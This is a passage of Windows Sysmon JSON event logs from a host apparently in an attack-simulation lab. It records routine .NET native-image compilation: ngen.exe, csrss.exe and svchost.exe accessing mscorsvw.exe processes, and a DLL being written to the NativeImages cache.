05:59:45.059","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-00101E0B1100}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7619,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.059\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-00101E0B1100}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.059","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-00101E0B1100}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7620,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-00101E0B1100}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-00101E0B1100}","TargetProcessId":"672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7621,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:45.340\r\nProcessGuid: {A837DB8D-04D1-5F25-0000-00101E0B1100}\r\nProcessId: 672\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\2a0-0\\System.Runtime.DurableInstancing.dll\r\nCreationUtcTime: 2020-08-01 05:59:45.340","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:45.340","ProcessGuid":"{A837DB8D-04D1-5F25-0000-00101E0B1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\2a0-0\\System.Runtime.DurableInstancing.dll","CreationUtcTime":"2020-08-01 05:59:45.340","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7622,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.387\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-001052101100}\r\nTargetProcessId: 4320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.387","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-001052101100}","TargetProcessId":"4320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7623,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.387\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-001052101100}\r\nTargetProcessId: 4320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.387","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-001052101100}","TargetProcessId":"4320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7624,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.387\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-001052101100}\r\nTargetProcessId: 4320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.387","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-001052101100}","TargetProcessId":"4320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7625,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.418\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-001057131100}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.418","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-001057131100}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7626,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.418\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-001057131100}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.418","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-001057131100}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7627,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-001057131100}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 